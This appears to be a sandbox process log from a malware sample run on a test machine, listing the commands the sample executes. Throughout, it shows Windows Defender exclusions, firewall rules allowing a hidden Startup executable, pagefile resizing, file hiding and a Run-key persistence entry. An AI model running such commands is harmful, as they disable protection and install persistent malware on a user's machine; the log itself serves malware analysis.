powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\4.zip"'
2912powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.zip"'
3004powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\box.exe"'
1120powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\box.exe"'
21127z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y 4.zip
2184netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2516netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2632WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
2780WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
2720attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
3032reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "box" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\box.exe" /F
9404.exe "4.exe"
2080